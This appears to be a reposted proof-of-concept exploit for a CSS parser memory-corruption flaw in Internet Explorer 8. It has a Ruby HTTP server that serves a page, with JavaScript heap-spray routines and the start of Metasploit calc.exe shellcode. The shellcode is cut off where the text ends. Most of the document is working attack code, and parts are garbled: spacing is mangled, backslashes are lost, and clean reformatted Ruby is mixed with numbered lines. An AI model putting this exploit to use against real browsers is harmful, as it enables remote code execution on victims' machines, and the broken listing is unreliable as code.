Internet Explorer 8 is a web browser released by Microsoft. A vulnerability in its CSS parser may allow remote code execution. This vulnerability was first reported on wooyun by: logging. For more on the vulnerability analysis and the exploit code, see http://www.breakingpointsystems.com/community/blog/ie-vulnerability/; that document presents the write-up titled "When A DoS Isn't A DoS".
[+] Info:
~~~~~~~~~
Internet Explorer 8 CSS Parser Exploit
[+] Poc:
~~~~~~~~~
View sourceprint? 001 #! /Usr/bin/env ruby
002
003 # Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
004 # Author: Nephi Johnson (d0c_s4vage)
005
006 require socket
007
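# Writes a minimal HTTP/1.1 response (status line, fixed headers, body) to
# +sock+ and reports whether the write succeeded.
#
# The listing this was recovered from is whitespace- and backslash-mangled;
# the CRLF line terminators, the quoting and the escape sequences below are
# reconstructed, so compare against the upstream source before relying on
# exact bytes.
#
# @param sock [IO] open socket (anything responding to #write)
# @param data [String] response body
# @param opts [Hash] :code (status code, default "200"), :message (reason
#   phrase, default "OK"), :type (Content-Type, default "text/html")
# @return [Boolean] true on success, false if the write raised IOError or a
#   SystemCallError (e.g. the peer went away)
def http_send(sock, data, opts = {})
  defaults = { :code => "200", :message => "OK", :type => "text/html" }
  opts = defaults.merge(opts)

  code = opts[:code]
  message = opts[:message]
  type = opts[:type]

  headers = [
    "HTTP/1.1 #{code} #{message}",
    # The Date header is a fixed value in the original listing; a real
    # server would emit the current time here.
    "Date: Sat, 11 Dec 2010 14:20:23 GMT",
    "Cache-Control: no-cache",
    "Content-Type: #{type}",
    "Pragma: no-cache",
    # bytesize rather than length: Content-Length counts octets, and the
    # two differ for non-ASCII bodies.
    "Content-Length: #{data.bytesize}"
  ]
  to_send = headers.join("\r\n") + "\r\n\r\n" + data

  puts "[+] Sending:"
  headers.each { |line| puts line }

  begin
    sock.write(to_send)
  rescue IOError, SystemCallError
    # The original used the `... rescue return false` modifier, which hides
    # every StandardError; only I/O failures are expected on this line.
    return false
  end
  true
end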
030
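# Waits up to +timeout+ seconds for +sock+ to become readable, then reads a
# single chunk of at most 1024 bytes into +out_str+ (replacing its contents)
# and echoes it to stdout.
#
# @param sock [IO] connected socket
# @param out_str [String] buffer that receives the data via String#replace
# @param timeout [Numeric] seconds to wait for readability
# @return [Boolean] true if data was read; false on timeout or I/O error, in
#   which case the socket has been closed
#
# Note: a single recv of 1024 bytes is not a complete HTTP request read; a
# request larger than that, or one arriving in several segments, is truncated.
def sock_read(sock, out_str, timeout = 5)
  ready = IO.select([sock], [], [], timeout)
  unless ready
    sock.close
    return false
  end

  out_str.replace(sock.recv(1024))
  puts "[+] Received:"
  out_str.split("\n").each { |line| puts line }
  true
rescue IOError, SystemCallError
  # The original rescued Exception, which also traps Interrupt and
  # SystemExit; only I/O failures are expected here. The socket is closed on
  # error as well as on timeout so a failed read does not leak the
  # descriptor.
  sock.close unless sock.closed?
  false
end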
047
# Widens +str+ to two bytes per input byte by prefixing every byte with a
# NUL. The mangled listing shows "x00"; a leading backslash is assumed.
#
# @param str [String] input bytes
# @return [String] NUL-interleaved copy, twice the length of +str+
def to_uni(str)
  str.each_byte.map { |byte| "\x00#{byte.chr}" }.join
end
055
056 @ css_name = "x00sx03sx00sx03sx00sx03sx00sx00sx03s"
057 @ html_name = "test.html"
058 placeholder = "a" * (@ css_name.length/2)
059
060 @ html = <-HTML
061 <script>
062 function dup_str (str, length ){
063 var res = str;
064 while (res. length <length ){
065 res + = res;
066}
067 res = res. substr (res. length-length );
068 return res;
069}
070
071 function to_bin (str ){
072 var res = "";
073 while (str. length> 0 ){
074 var first = str. substr (0, 2 );
075 var second = str. substr (2, 2 );
076 res + = "% u" + second + first;
077 str = (str. length> 4 )? Str. substr (4 ):"";
078}
079 return unescape (res );
080}
081
082 // first heap spray
083 var base = dup_str (to_bin ("0c0c0c090000000800000073007300000000000000730073030c"), 512 + 6 );
084 var arr = []
085 for (var I = 0; I <60000; I ++ ){
086 arr [I] = ["" + base]. join ("");
087}
088
089 // second heap spray w/shellcode
090 var nops = dup_str (to_bin ("0c0c0c0c"), 4096 + 6 );
091
092 // windows/exec-200 bytes
093 // asploit.com "> http://www.metasploit.com
094 // EXITFUNC = process, commandid calc.exe
095 var shellcode = unescape ("% ue8fc % u0089 % u0000 % u8960 % u31e5 % u64d2 % u528b % u8b30" +
096